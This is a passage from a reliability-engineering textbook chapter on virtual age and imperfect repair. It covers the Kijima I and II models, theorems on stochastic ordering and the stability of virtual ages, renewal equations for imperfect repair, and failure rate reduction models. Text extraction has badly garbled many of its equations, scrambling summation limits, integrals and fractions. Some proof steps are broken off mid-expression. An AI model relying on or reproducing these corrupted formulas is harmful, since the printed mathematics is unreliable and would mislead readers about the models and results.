1996; Stadje and Zuckerman, 1991). The latter model was first described by Malik (1979). The Kijima II model and its probabilistic analysis was also independently suggested in Finkelstein (1989) and later considered in numerous subsequent publications. We will give relevant references in what follows. The term ‘virtual age’ in connection with imperfect repair models was probably used for the first time in Kijima et al. (1988), but the corresponding meaning was already used in a number of publications previously. When q( x) = qx , the intensity process λt can be defined in the explicit form. After the first repair the virtual age v1 is q x1 , after the second repair v2 = q(qx1 + x2 ) = q 2 x1 + qx2 ,…, and after the n th repair the virtual age is n−1 vn = q n x1 + q n−1 x2 + ... + qxn = ∑ q n−i xi +1 , (5.28) i =0 where xi , i ≥ 1 are realizations of interarrival times X i in the point process of imperfect repairs. Therefore, in accordance with the general Equation (5.22), the intensity process for this specific model with a linear q( x) = qx is ⎛ N ( t ) −1 i =0 λt = λ ⎜⎜ t − S N (t ) + ∑q n −i ⎞ X i +1 ⎟⎟ . ⎠ (5.29) A similar equation in a slightly different form was obtained by Doyen and Gaudoin (2004). Note that the ‘structure’ of the right-hand side of Equation (5.29) in our notation explicitly defines the corresponding virtual age. Example 5.9 Whereas the repair action in the Kijima II model depends on the whole history of the corresponding stochastic process, the dependence in the Kijima I model is simpler and takes into account the reduction of the last cycle increment only. Similar to (5.26), v0 = 0, v1 = qx1 , v2 = v1 + qx2 ,...., vn = vn−1 + qxn . Therefore, (5.30) vn = q( x1 + x2 + ... + xn ), Vn = q( X 1 + X 2 + ... + X n ) , and we arrive at the important conclusion that this is exactly the same model as the one defined by the g-renewal process of the previous section (Kijima et al., 1988). These considerations give another motivation for using the Kijima I model for obtaining the required number of ageing spare parts. Moreover, Shin et al. (1996) had developed an optimal preventive maintenance policy in this case. Virtual Age and Imperfect Repair 113 In accordance with Equations (5.22) and (5.30), the intensity process for this model is λt = λ (t − S N (t ) + VS N (T ) ) = λ (t − S N (t ) + qS N (t ) ) = λ (t − (1 − q) S N (t ) ) . The obtained form of the intensity process suggests that the calendar age t is decreased in this model by an increment proportional to the calendar time of the last imperfect repair. Therefore, Doyen and Gaudoin (2004) call it the “arithmetic age reduction model”. The two types of the considered models represent two marginal cases of history for the corresponding stochastic repair processes, i.e., the history that ‘remembers’ all previous repair times and the history that ‘remembers’ only the last repair time, respectively. Intermediate cases are analysed in Doyen and Gaudoin (2004). Note that, as q is a constant, the repair quality does not depend on calendar time, or on the repair number. The original models in Kijima (1989) were, in fact, defined for a more general setting when the reduction factors qi , i ≥ 1 are different for each cycle (the case of independent random variables Qi , i ≥ 1 was also considered). The quality of repair that is deteriorating with i can be defined as 0 < q1 < q2 < q3 ,... , which is a natural ordering in this case. Equation (5.28) then becomes n n n n i =1 i=2 i =1 k =i vn = x1 ∏ qi + x2 ∏ qi + ... + qn xn = ∑ xi ∏ qk , (5.31) and the corresponding intensity process is similar to (5.29), i.e., ⎛ N (t ) N (t ) i =1 k =i λt = λ ⎜⎜ t − S N (t ) + ∑ X i ∏ qk ⎟⎟ . (5.32) The virtual age in the Kijima I model is v0 = 0, v1 = q1 x1 , v2 = v1 + q2 x2 ,...., n vn = vn−1 + qn xn = ∑ qi xi , 1 and the corresponding intensity process is defined by ⎛ N (t ) i =1 λt = λ ⎜⎜ t − S N (t ) + ∑ qi X i ⎟⎟ . (5.33) The practical interpretation of (5.31) is quite natural, as the degree of repair at each cycle can be different and usually deteriorates with time. The practical application of Model (5.33) is not so evident. Substitution of a random Qi instead of a 114 Failure Rate Modelling for Reliability and Risk deterministic qi in (5.32) and (5.33) results in general relationships for the intensity processes in this case. Note that, when Qi ≡ Q, i = 1,2,... are i.i.d. Bernoulli random variables, the Kijima II model can be interpreted via the Brown–Proschan model of Section 4.5. In this model the repair is perfect with probability p and is minimal with probability 1− p . Example 5.10 We will now derive Equation (4.30) for the Brown–Proschan model ( p(t ) ≡ p ) in a direct way. Denote by S nP (x) the Cdf of the arrival time S n in the Poisson process with rate λ (t ) . Therefore, in accordance with (4.6), n S nP ( x) = ∑ exp{− Λ (t )} 0 (Λ (t )) n . n! Thus, the survival function of the time between perfect repairs FP (t ) is ∞ Fp (t ) = ∑ exp{− Λ(t )} 0 (Λ(t )) n (1 − p ) i n! = exp{−Λ (t )} exp{(1 − p)Λ (t )} ⎧⎪ t ⎫⎪ = exp⎨− ∫ pλ (u )du ⎬ , ⎪⎩ 0 ⎪⎭ where the term (1 − p) i defines the probability that all i, i = 1,2,... repairs in [0, t ) are minimal. Consider now briefly the comparisons of the relevant characteristics of the described models with respect to the different values of the reduction factor q . With this in mind, denote the virtual age just after the i th repair by Vi q . Kijima (1989) proved an intuitively expected result stating that in both models, virtual ages for different values of the age reduction factor q are ordered in the sense of the usual stochastic ordering (Definition 3.4), i.e., Vi q1 < st Vi q2 , q2 > q1 , i ≥ 1 . (5.34) This means that the larger the value of q , the larger (in the sense of usual stochastic ordering) the random virtual age after each repair. This inequality can be loosely interpreted by noting that larger values of the reduction factor ‘push’ the process to the right along the time axis. q q Denote by X i j (t ) the Cdf of X i j , j = 1,2 . Theorem 5.1. Let 0 < q1 < q2 ≤ 1 and the governing F (t ) be IFR. Then the following inequality holds for imperfect repair models (5.26) and (5.30): X iq1 > st X iq2 , i ≥ 1 , Virtual Age and Imperfect Repair 115 which means that larger values of q result in stochastically smaller interarrival times. Proof. Integrating by parts y +t ∞ ⎛ ⎞ q q X i j (t ) = d [Vi −1j ( y )]⎜1 − exp λ (u )du ⎟ ⎜ ⎟ 0 y ⎝ ⎠ y +t y +t ⎛ ⎞ ∞ q ⎛ ⎞ j ⎜ ⎟ ⎜ = lim y →∞ 1 − exp ∫ λ (u )du − ∫ Vi −1 ( y )d y 1 − exp ∫ λ (u )du ⎟ , ⎜ ⎟ ⎜ ⎟ y y ⎝ ⎠ 0 ⎝ ⎠ q q where Vi j (t ) denotes the Cdf of the virtual age Vi j . As the governing failure rate λ (t ) is increasing, the differential d y in the last integrand is positive. Therefore, q comparing X i j (t ) for j = 1 and j = 2 and taking into account Inequality (5.34) proves the theorem. Interpretation of this theorem is also rather straightforward. The larger the (initial) virtual age at the beginning of a cycle, the larger the initial value ‘on the failure rate curve’ λ (t ) . As λ (t ) is increasing, this leads to the smaller (in the defined sense) cycle duration. Other more advanced inequalities of a similar type can be found in Kijima (1989) and Finkelstein (1999). 5.4 Ageing and Monotonicity Properties The content of this section is rather technical and the corresponding proofs of the main results can be omitted at first reading. The presentation mostly follows our recent paper (Finkelstein, 2007). We start by defining some ageing properties of the renewal-type point processes. Definition 5.7. A stochastic point process is stochastically ageing if its interarrival times { X i }, i ≥ 1 are stochastically decreasing, i.e., X i +1 ≤ st X i , i ≥ 1 . (5.35) Obviously, the renewal process, in accordance with this definition, is not stochastically ageing, whereas the non-homogeneous Poisson process is ageing if its rate is an increasing function. We have chosen the simplest and the most natural type of ordering, but other types of ordering can also be used. The following definition deals with the ageing properties of the sequence of virtual ages at the start (end) of cycles for the point processes of imperfect repair. Definition 5.8. The virtual age process At , t ≥ 0 defined by Equation (5.23) is stochastically increasing if the (embedded) sequence of virtual ages at the start (end) of cycles is stochastically increasing. 116 Failure Rate Modelling for Reliability and Risk If, e.g., a governing F (t ) is IFR, then the stochastically increasing At , t ≥ 0 describes the overall deterioration of our repairable item with time, which is the case in practice for various systems that are wearing out. However, if the failure rate λ (t ) is decreasing, the stochastically increasing At , t ≥ 0 leads to an ‘improvement’ of a repairable item. This is similar to the obvious fact that the MRL of an item with a decreasing λ (t ) is an increasing function. Note that Definition 5.8 is formulated under the assumption of the ‘sliding along the failure rate curve’ model. Although our interest is mainly in the models with increasing λ (t ) , some results will be given for a more general case as well. Now we turn to a more detailed study of the generalized Kijima II model with a non-linear quality of repair function q (t ) (Finkelstein, 2007). Assume that this is an increasing, concave function that is continuous in [0, ∞) and q(0) = 0 . The assumption of concavity is probably not so natural, but at that time, however, not so restrictive, and we will need it for proving the results to follow. Thus, q(t1 + t 2 ) ≤ q(t1 ) + q (t 2 ), t1 , t 2 ∈ [0, ∞). (5.36a) q(t ) < q0t , (5.36b) Also, let where q0 < 1 , which shows that repair rejuvenates the failed item, at least to some extent, and that q(t ) cannot be arbitrarily close to q(t ) = t (minimal repair). Let a cycle start with a virtual age v . Denote by X (v) the cycle duration with the corresponding survival function given by the right-hand side of Equation (5.27) for vi −1 = v . The next cycle will start at a random virtual age q(v + X (v)) . We will be interested in some equilibrium age v * . Define this virtual age as the solution to the following equation: E[q(v + X (v))] = v . (5.37) Thus, if some cycle of a general (imperfect) repair process starts at virtual age v * , then the next cycle will start with a random virtual age with the expected value v * , which is obviously a martingale property. Theorem 5.2. Let { X n }, n ≥ 1 be a process of imperfect repair, defined by Equations (5.26), where an increasing, continuous quality of repair function q(t ) satisfies Equations (5.36a) and (5.36b). Assume that the governing distribution F (t ) has a finite first moment and that the corresponding failure rate is either bounded from below for sufficiently large t by c > 0 or is converging to 0 as t → ∞ such that limt → ∞ tλ (t ) = ∞ . (5.38) Then there exists at least one solution to Equation (5.37), and if there is more than one, the set of these solutions is bounded in [0, ∞) . Proof. As E[X (0)] < ∞ , it is evident that E[T (v)] < ∞, v > 0 . If λ (t ) is bounded Virtual Age and Imperfect Repair 117 from below by c > 0 , then E[ X (v)] ≤ 1 . c Applying (5.36a), we obtain E[q(v + X (v )] ≤ q(v ) + E[ X (v)] . (5.39) It follows from Equations (5.36b) and (5.39) that E[q(v + X (v))] < v for sufficiently large v . On the other hand, E[q( X (0))] > 0 , which proves the first part of the theorem, as the function E[q (v + X (v))] − v is continuous in ν , positive at v = 0 , and negative for sufficiently large v . Now, let λ (t ) → 0 as t → ∞ . Consider the following quotient: ⎧⎪ x ⎫⎪ exp⎨− λ (u )du ⎬dx ⎪⎩ 0 ⎪⎭ E[ X (v)] v . = v v ⎧⎪ ⎫⎪ v exp⎨− λ (u )du ⎬ ⎪⎩ 0 ⎪⎭ ∞ Applying L’Hopital’s rule and using Assumption (5.38), we obtain lim v→∞ 1 E[ X (v)] = lim t →∞ =0. v λ ( v )v − 1 (5.40) Therefore, applying Inequality (5.39) and taking into account (5.36a) and (5.40), we obtain E[q(v + X (v))] q(v) E[ X (v)] ≤ + 0 . 118 Failure Rate Modelling for Reliability and Risk Then the expectation of the virtual age at the start of the next cycle will ‘be closer’ to v * , i.e., v* < E[q(v * + Δv + X (v * + Δv))] < v * + Δv . (5.41) Proof. As stated in Corollary 5.1, at least one solution to Equation (5.37) exists in this case. Let us first prove the second inequality in (5.41). Taking into account that q(t ) is an increasing function and that the random variables X (v) are stochastically decreasing in v (for increasing λ (t ) ), we have E[q (v * + Δv + X (v * + Δv))] < E[q (v * + Δv + X (v*))] . When obtaining this inequality the following simple fact was used. If two distributions are ordered as F1 (t ) > F2 (t ), t ∈ (0, ∞) and g (t ) is an increasing function, then by integrating by parts it is easy to see that ∞ 0 0 ∫ g (t )dF2 (t ) 0. Then, in accordance with (5.41), we obtain E[q(v~ + X (v~))] = E[q (v * + Δv + X (v * + Δv))] < v * + Δv = v~ , which contradicts (5.43). It can be shown that the results of this section hold when the repair action is stochastic. That is, {Qi }, i ≥ 1 is a sequence of i.i.d. random variables (independent of other stochastic components of the model) with support in [0,1] and E[Qi ] < 1 . Virtual Age and Imperfect Repair 119 We believe that under certain reasonable ordering assumptions these results under reasonable assumptions can also be generalized to a sequence of non-identically distributed random variables. The described properties show that there is a shift in the direction of the equilibrium point v * of the starting virtual age of the next cycle compared to the starting virtual age of the current cycle. Note that, for the minimal repair process, the corresponding shift is always in the direction of infinity. In what follows in this section, we will study the properties of the virtual age process At , t ≥ 0 explicitly defined for the model under consideration by Relationships (5.26). It will be shown under rather weak assumptions that this process is stochastically increasing in terms of Definition 5.2 and that it is becoming stable in distribution (i.e., converges to a limiting distribution as t → ∞ ). These issues for the linear q (t ) were first addressed in Finkelstein (1992b). The rigorous and detailed treatment of monotonicity and stability for rather general age processes driven by the governing F (t ) was given by Last and Szekli (1998). The approach of Last and Szekli was based on applying some fundamental probabilistic results: a Lyones-type scheme and Harris-recurrent Markov chains were used. Our approach for a more specific model (but with weaker assumptions on F (t ) and with a time dependent q(t ) ) is based on direct probabilistic reasoning and on the appealing ‘geometrical’ notion of an equilibrium virtual age v * . Apart from obvious engineering applications, these results may have some important biological interpretations. Most biological theories of ageing agree that the process of ageing can be considered as process of “wear and tear” (see, e.g., Yashin et al., 2000). The existence of repair mechanisms in organisms decreasing the accumulated damage on various levels is also a well-established fact. As in the case of DNA mutations in the process of cell replication, this repair is not perfect. Asymptotic stability of the repair process means that an organism, as a repairable system, is practically not ageing in the defined sense for sufficiently large t . Therefore, the deceleration of the human mortality rate at advanced ages (see, e.g., Thatcher, 1999) and even the approaching of this rate to the mortality plateau can be explained in this way. This conclusion relies on the important assumption that a repair action decreases the overall accumulated damage and not only its last increment. Another possible source of this deceleration is in the heterogeneity of human populations. This topic is discussed in the next chapter, whereas some biological considerations are analysed in Chapter 10. Denote the virtual age distribution at the start of the (i + 1) th cycle by θ iS+1 (v) , i = 1,2,... , and denote the corresponding virtual age distribution at the end of the previous, i th cycle by θ iE (v), i = 1,2,... . It is clear that, in accordance with (5.26), we have θ iS+1 (v) = θ iE (q −1 (v)), i = 1,2,..., (5.44) where the inverse function q −1 (v) is also increasing. This can easily be seen, since θ iS+1 (v) = Pr[Vi +S1 ≤ v] = Pr[ q(Vi E ) ≤ v] = Pr[Vi E ≤ q −1 (v)] , 120 Failure Rate Modelling for Reliability and Risk where Vi+S1 and Vi E are virtual ages at the start of the (i + 1) th cycle and at the end of the previous cycle, respectively The following theorem states that the age processes under consideration are stochastically increasing. Theorem 5.4. Virtual ages at the end (start) of each cycle in imperfect repair model (5.26), (5.36a)–(5.36b) form the following stochastically increasing sequences: Vi +E1 > st Vi E , Vi +S1 > st Vi S , i = 1,2,... . Proof. In accordance with Definition 3.4, we must prove that θ i+E1 (v) > θ i E (v), θ i+S2 (v) > θ i+S1 (v); v > 0, i = 1,2,... . (5.45) We shall prove the first inequality; the second one follows trivially from (5.44). Consider the first two cycles. Let v1E be the realization of V1E , where V1E is the virtual age at the end of the first cycle and at the same time the duration of this cycle. Then (for this realization) the age at the end of the second cycle is q(v1E ) + X ( q ( v E ) , 1 where, as usual, the notation X v means that this random variable has the Cdf F (t | v) . It is clear that it is stochastically larger than V1E , and, as this property holds for each realization, (5.45) holds for i = 1 . Assume that (5.45) holds for i = n − 1, n ≥ 3 . Due to the definition of virtual age at the start and the end of a cycle, integrating by parts and using (5.44), we obtain v ⎧⎪ ⎪⎩ v ⎫⎪ ⎞ ⎪⎭ ⎟⎠ [ ] θ nE (v) = ∫ ⎜1 − exp⎨− ∫ λ (u )du ⎬ ⎟d θ nS ( x) , 0 ⎜ ⎝ x v ⎛ ⎧⎪ v ⎫⎪ ⎞ = θ nE−1 (q −1 ( x))d x ⎜ exp⎨− λ (u )du ⎬ ⎟, ⎜ ⎪⎩ x ⎪⎭ ⎟⎠ 0 ⎝ v ⎧⎪ ⎪⎩ v ⎫⎪ ⎞ ⎪⎭ ⎟⎠ [ θ nE+1 (v) = ∫ ⎜1 − exp⎨− ∫ λ (u )du ⎬ ⎟d θ nS+1 ( x) 0 ⎜ ⎝ x ] v ⎛ ⎫⎪ ⎞ ⎧⎪ v = θ nE (q −1 ( x))d x ⎜ exp⎨− λ (u )du ⎬ ⎟, ⎜ ⎪⎭ ⎟⎠ ⎪⎩ x 0 ⎝ where we use the fact that ⎫⎪ ⎧⎪ x + ( v − x ) ⎧⎪ v ⎫⎪ λ (u )du ⎬ = exp⎨− λ (u )du ⎬ exp⎨− ⎪⎩ x ⎪⎭ ⎪⎭ ⎪⎩ x (5.46) (5.47) Virtual Age and Imperfect Repair 121 is the probability of survival from initial virtual age x to v > x . Taking into account the induction assumption and comparing (5.46) and (5.47), using similar reasoning to that used when obtaining (5.42), we have θ nE (v) < θ nE−1 (v) ⇒ θ nE (q −1 (v)) < θ nE−1 (q −1 (v)) ⇒ θ nE+1 (v) < θ nE (v) , which completes the proof. The next theorem states that the increasing sequences of distribution functions θ i E (v), θ i S (v ) converge to a limiting distribution function as i → ∞ . Thus, the imperfect repair process considered is stable in the defined sense. Theorem 5.5. Taking into account the conditions of Theorem 5.4, assume additionally that the governing distribution F (t ) is IFR. Then there exist the following limiting distributions for virtual ages at the start and end of cycles: lim i→∞ θ iE (v) = θ LE (v) and lim i → ∞ θ iS (v) = θ LS (v) . (5.48) Proof. The proof is based on Theorems 5.3 and 5.4. As Sequences (5.45) increase at each v > 0 , there can be only two possibilities. Either there are limiting distributions (5.48) with uniform convergence in [0, ∞) or the virtual ages grow infinitely, as for the case of minimal repair (q = 1) . The latter means that, for each fixed v >0, lim i → ∞ θ iE (v) = 0 and lim i → ∞ θ iS (v ) = 0 . (5.49) Assume that (5.49) holds and consider the sequence of virtual ages at the start of a cycle. Then, for an arbitrary small ς > 0 , we can find n such that Pr[Vi S ≤ v*] ≤ ς , i ≥ n , where v * is an equilibrium point, which is unique and finite according to Corollary 5.2. It follows from (5.41) that for each realization viS > v * the expectation of the starting age at the next cycle is smaller than viS . On the other hand, the ‘contribution’ of ages in [0, v*) can be made arbitrarily small, if (5.49) holds. Therefore, it can easily be seen that for the sufficiently large i E[Vi +S 1 ] < E[Vi S ] . This inequality contradicts Theorem 5.4, according to which expectations of virtual ages form an increasing sequence. Therefore, Assumption (5.49) is wrong and (5.48) holds. As previously, the result for the second limit in (5.48) follows trivially from (5.44). 122 Failure Rate Modelling for Reliability and Risk Corollary 5.3. If F (t ) is IFR, then the sequence of interarrival lifetimes { X n }, n ≥ 1 is stochastically decreasing to a random variable with a limiting distribution, i.e., ∞⎛ ⎧⎪ v + t ⎫⎪ ⎞ limi → ∞ Fi (t ) = FL (t ) = ⎜1 − exp⎨− λ (u )du ⎬ ⎟d (θ LS (v)) . ⎜ ⎪⎩ v ⎪⎭ ⎟⎠ 0⎝ (5.50) Proof. Equation (5.50) follows immediately after taking into account that convergence in (5.48) is uniform. On the other hand, comparing ∞⎛ ⎫⎪ ⎞ ⎧⎪ v +t Fi (t ) = ⎜1 − exp⎨− λ (u )du ⎬ ⎟d (θ iS (v)) ⎜ ⎪⎭ ⎟⎠ ⎪⎩ v 0⎝ with ∞⎛ ⎧⎪ v+t ⎫⎪ ⎞ Fi +1 (t ) = ⎜1 − exp⎨− λ (u )du ⎬ ⎟d (θ iS+1 (v)) ⎜ ⎪⎩ v ⎪⎭ ⎟⎠ 0⎝ it is easy to see, using the same argument as in the proof of Theorem 5.3, that Fi +1 (t ) > Fi (t ), t > 0; i = 1,2,... (i.e., a stochastically decreasing sequence of interarrival times), as θ is+1 (v) < θ is (v) , and the integrand function is increasing in v for the IFR case. Example 5.11 We will now obtain a stability property for the simplified imperfect maintenance model in a direct way. Note that practically all imperfect repair models can be used for describing imperfect maintenance. Consider the imperfect maintenance actions for a repairable item with an arbitrary lifetime distribution F (t ) that are performed at calendar instants of time nT , n = 1,2,... (Kahle, 2007). Assume that all occurring failures are minimally repaired and that at each maintenance the corresponding virtual age is decreased in accordance with the Kijima II model with a constant q, 0 < q < 1 . Therefore, taking into account Equation (5.28), the virtual age after the n th maintenance is vn = T n −1 ∑q i =0 n −i =T n ∑q i =T 1 1 (1 − q n ) . 1− q (5.51) Thus, the virtual age vn is deterministic and lim n→∞ vn = 1 , 1− q which illustrates the stability property of Theorems 5.4 and 5.5 for this special case. Virtual Age and Imperfect Repair 123 5.5 Renewal Equations Renewal equations for g-renewal processes (5.17) and (5.18), or, equivalently, for the age reduction model (5.30), were discussed in Section 5.2.1. We mentioned that although the form of these equations differs from the ordinary renewal equations (4.10) and (4.11), the well-developed numerical methods can be used for obtaining the corresponding solutions. It turns out that renewal equations for the age reduction model (5.26) and (5.27) (the Kijima II model) are more complex. In order to derive these equations we must assume that a repairable item, in accordance with Model (5.26) and (5.27), starts operating at age (virtual age) x . Let N (t , x) be the number of imperfect repairs in [0, t ) for this initial condition. Denote the corresponding renewal function and the renewal density function by H (t , x) and h( x, t ) , respectively, i.e., H (t , x) = E[ N ( x, t )], h(t , x) = ∂ H ( x, t ) . ∂t Conditioning on the first repair at t = y , similarly to Equation (4.12), t H (t , x) = E[ N (t , x) | X 1 = y ] 0 f ( y + x) dy F ( x) t = [1 + H (t − y, q ( x + t ))] 0 f ( y + x) dy F ( x) t = F (t | x) + H (t − y, q ( x + t )) f ( y | x)dy . (5.52) 0 In a similar way: t h(t , x) = ∫ ∂t ( E[ N (t , x) | X 1 = y ]) f ( y | x )dx 0 t = f (t | x) + h(t − y , q ( x + t )) f ( y | x)dy . (5.53) 0 These equations were first derived in Finkelstein (1992b) and independently by Dagpunar (1997). It can easily be checked that h(t , x ) = λ ( x + t ) is the solution to Equation (5.53) for the case of minimal repair when q ( x ) = x . For the case of perfect repair, when q( x) = 0 , these equations reduce to ordinary renewal equations. Because of the extra dependence on x in the functions H ( x, t ) and h( x, t ) , Equations (5.52) and (5.53) are more complex than the corresponding ‘univariate’ versions (4.10) and (4.11), respectively. When the function q(x) is linear, Equation (5.53) can be solved numerically for t ∈ [0, D], D > 0 . Assume that h(t , x) is differentiable with respect to x . Integration by parts (Dagpunar, 1997) yields 124 Failure Rate Modelling for Reliability and Risk h(t , x ) = f (t | x) + h(t , qx) − λ (q(t + x)) F (t | x) t + F (t | x)dh(t − y, q( x + y )) . 0 Following the approach used by Xie (1991a), the integral in this equation can be approximated by the discrete sum, dividing [0, D] into n subintervals each of length Δ , where nΔ = D . In Dagpunar (1997), a numerical solution is obtained for h(t ,0) for the case of the Weibull F (x ) . It was shown that h(t ,0) rather quickly converges to a constant. In view of our results of the previous section on the stability of the process of imperfect repair, this is not surprising. Corollary 5.3 states that this process converges as t → ∞ to an ordinary renewal process with the Cdf defined by Equation (5.50). Therefore, similar to the asymptotic result (4.16), we have H (t ,0) = t [1 + o(1)], mL h(t ,0) = 1 [1 + o(1)], mL (5.54) where mL is the mean defined by the limiting distribution FL (t ) in (5.50). Note that the same results hold for H ( x, t ) and h( x, t ) , respectively. Example 5.12 Consider a system of two identical components with failure rates λ (t ) . The second component is in a state of (cold) standby. After a failure of the main component, the second component is switched into operation, while the failed one is instantaneously minimally repaired. Then the process continues in the same pattern. Let us call the corresponding point process of failures (repairs) the generalized process of minimal repairs. Denote by h(t , x, y ) the renewal density function for this process, where x is the initial age of the main component and y is the initial age of the standby component at t = 0 . Similar to Equation (5.53), t h(t , x, y ) = f (t | x) + h(t − u , y, x + u ) f (u | x) du . 0 This integral equation can also be solved using numerical methods. On the other hand, when x = 0, y = 0 , a simple approximate solution exists if additional switching (maintenance actions) is allowed. Assume that the main component is operating in the interval of time [0, Δt ) , then it is switched to standby and the former standby component operates in [Δt ,2Δt ) , etc. When λ (t ) is increasing, these switching actions increase the reliability of our system. Denote by λΔt (t ) the resulting failure rate of the system. It can be shown that the following asymptotic relation holds: lim Δt →0 | λΔt − λ (t / 2) |= 0 , which means that asymptotically, as Δt → 0 , the failure rate of the system can be approximated by the function λ (t / 2) . This operation can be interpreted as the corresponding scale transformation. The failures of the main component are instanta- Virtual Age and Imperfect Repair 125 neously repaired by switching to a standby component, which is approximately (for Δt → 0 ) equivalent to minimal repair. Therefore, h(t ,0,0) ≈ λ (t / 2) for the sufficiently small Δt . 5.6 Failure Rate Reduction Models A crucial feature of the age reduction models of the previous sections is the fixed shape of the failure rate λ (t ) defined by the governing Cdf F (t ) . The starting point of each cycle ‘lies’ on the failure rate curve and its position is uniquely defined by the corresponding virtual age v , whereas the duration of the cycle follows the Cdf F (t | v) . Therefore, imperfect repair rejuvenates an item to some intermediate level between perfect and minimal repair. This approach can be justified in many engineering and biological applications. Another positive feature for modelling is that the corresponding probabilistic model is formalized in terms of the generalized renewal processes. On the other hand, the assumption of the fixed shape of the failure rate is not always convincing and other approaches should be investigated. Before describing the pure failure rate reduction approach, we briefly discuss the model that contains most of the models considered so far as various special cases. The Dorado–Hollander–Sethuraman (DHS) model (Dorado et al., 1997) is a general model, which describes a departure from the pure age reduction approach. This model assumes that there exist two sequences ai and vi , i = 1,2,... such that a1 = 1, v1 = 0 and the conditional distributions of the cycle durations for the point process of imperfect repairs are given by Pr[ X i > t | a1 ,..., ai , v1 ,..., vi , X 1 ,..., X i −1 ] = F (ai t + vi ) , F (vi ) (5.55) where F (t ) is the survival function for X 1 . We see that (5.55) extends (5.27) to additional scale transformations. Therefore, this model generalizes some of the imperfect repair models considered in this and the previous sections. When vi = 0 and ai = a i −1 , i ≥ 1 , we arrive at the geometric process of Section 4.3.3. When ai ≡ 1 and vi = q( x1 + x2 + ... + xn ), we obtain the Kijima I model (5.30) and the Relationship (5.28) results in the Kijima II model (5.26). The minimal repair case also follows trivially from (5.55). Note that Model (5.55) is in turn a specific case of the hidden age model of Finkelstein (1997) discussed by Remark 5.7. The main focus of Dorado et al. (1997) was on a nonparametric statistical estimation of ai and vi , i = 1,2,... . As F (t ) in this model can still be considered a governing distribution, the integral equations generalizing Equations (5.52) and (5.53) can also be derived in a formal way. The intensity process that corresponds to (5.55) is λt = a N (t )+1λ (v N (t )+1 + a N (t )+1 (t − S N (t ) )) , (5.56) 126 Failure Rate Modelling for Reliability and Risk where, as usual, S N (t ) denotes the time of the last imperfect repair before t . Failure rate reduction models differ significantly from age reduction models. Although some of these models can still be governed by an initial (baseline) Cdf and statistical inference of parameters involved can be well defined, a corresponding renewal-type theory cannot be developed. Furthermore, the motivation of the failure rate reduction is usually more formal than that of the age reduction. Consider, for example, the simplest geometric failure rate reduction model. Assume, as usual, that the first cycle of the process of imperfect repair is described by the Cdf F (t ) and the failure rate λ (t ) . Let the failure rate for the second cycle be aλ (t ) , where 0 < a < 1 with the corresponding survival function ( F (t )) a . The third cycle is described by the failure rate a 2 λ (t ) and the survival function ( F (t )) 2 a , etc. The corresponding intensity process is defined as (compare with the intensity process for geometric process (4.23)) λt = a N (t ) λ (t − S N (t ) ) . (5.57) Thus, the dissimilarity from the geometric process is in the absence of the scale parameter a N ( t ) in the argument of the failure rate function λ (t ) . But the presence of this parameter, in fact, enables the development of the corresponding renewal-type theory for geometric processes. Unfortunately this is not possible now for the defined geometric failure rate reduction model. Remark 5.10 The dissimilarity between geometric age reduction and failure rate reduction models is similar to that between the proportional and accelerated life models, as the failure rate for the ALM is aλ (at ) and aλ (t ) for the corresponding PH model. The arithmetic failure rate reduction model was studied in a number of publications (Chan and Shaw, 1993; Doyen and Gaudoin, 2004, among others). The meaningful renewal-type theory cannot be developed in this case but some useful results for modelling and statistical inference can be obtained. According to Doyen and Gaudoin (2004), this model is based on two assumptions: • Each repair action reduces the intensity process λt by an amount depending on the history of the imperfect repair process; Between consecutive imperfect repairs, realizations of the intensity process are vertically parallel to the initial (governing) failure rate λ (t ) . These assumptions lead to the following general form of the intensity process: N (t ) λt = λ (t ) − ∑ ϑi (ϑ1 ,..., ϑi −1 , S1 ,..., Si ) , (5.58) 1 where the function ϑi models the reduction of the intensity process that results from the i th imperfect repair, i = 1,2,... . Equation (5.58) can be simplified for specific settings. Assume that ϑi (ϑ1 ,...,ϑi −1 , S1 ,..., S i ) = λSi − aλSi = (1 − a )λSi , (5.59) Virtual Age and Imperfect Repair 127 where a is a reduction factor, 0 ≤ a ≤ 1 , that is constant for all cycles. Therefore, the intensity process in the first interval [0, S1 ) is λ (t ) . In the second interval [ S1 , S 2 ) , it is λ (t ) − aλ ( S1 ) . The intensity process in the third interval is (Rausandt and Hoylandt, 2004) λ (t ) − aλ ( S1 ) − a (λ ( S 2 ) − aλ ( S1 )) = λ (t ) − a[(1 − a ) 0 λ ( S 2 ) + (1 − a )1 λ ( S1 ) . Similarly, it can be shown that the general form of the intensity process in this special case is N (t ) λt = λ (t ) − a ∑ (1 − a ) i λ ( S N (t )−i ) . (5.60) i =0 The structure of this equation has a certain similarity with Equation (5.29), which defines the intensity process for the Kijima II model. Another model suggested by Doyen and Gaudoin (2004) resembles the Kijima I model (5.33) for age reduction when only the ‘input’ of the last cycle is reduced. The intensity process for this model is obviously defined as λt = λ (t ) − aλ ( S N (t ) ) . (5.61) The intermediate cases between (5.60) and (5.61) can also be considered. We end this section with a short summary comparing the properties of the two considered approaches to imperfect repair modelling. It seems that age reduction models are better motivated as they have a clear interpretation via the ‘reduction of degradation principle’ (e.g., the reduction of the cumulative failure rate or of the cumulative wear). They also usually allow derivation of the renewal-type equations, which can be important in certain applications (e.g., involving spare parts assessment). Although the failure rate itself can still be considered as a characteristic of degradation, its reduction as a model for degradation reduction looks rather formal. The vertical shift in the failure rate is also less motivated than a horizontal shift. The latter implies a clearly understandable shift in the corresponding distribution function and a convenient form of the MRL function in age reduction models. 5.7 Imperfect Repair via Direct Degradation As most of the imperfect repair models considered in this chapter can be interpreted in terms of degradation and its reduction, it is reasonable to discuss, at least in general, an approach that is directly based on reduction of some cumulative degradation. In this section, we will consider only some initial reasoning in this direction. Assume that an item’s degradation at each cycle of the corresponding repair process is described by an increasing stochastic process Wt , t ≥ 0, W0 = 0 with independent increments. A failure occurs when this process reaches a predetermined (deterministic) level r . The corresponding distribution of the hitting time X 1 for 128 Failure Rate Modelling for Reliability and Risk this process is the Cdf of the time to failure in this case, i.e., F1 (t ) = Pr[Wt ≥ r ] = Pr[ X 1 ≤ t ] . Thus, the duration of the first cycle of the repair process is distributed in accordance with the Cdf F1 (t ) . Perfect repair results in the restart of this process after the repair. Imperfect repair means that not all deterioration has been eliminated by the repair action. In line with the models of the previous sections, assume that the first imperfect repair action results in reducing degradation to the level q1r , 0 ≤ q1 ≤ 1 . The perfect repair action in this case corresponds to q1 = 0 , whereas minimal repair is defined by q1 = 1 . In accordance with the independent increments property of the underlying stochastic process Wt , t ≥ 0, W0 = 0 the Cdf of the second cycle duration is F2 (t ) = Pr[Wt ≥ r − q1r ] = Pr[ X 2 ≤ t ] . If all reduction factors on all 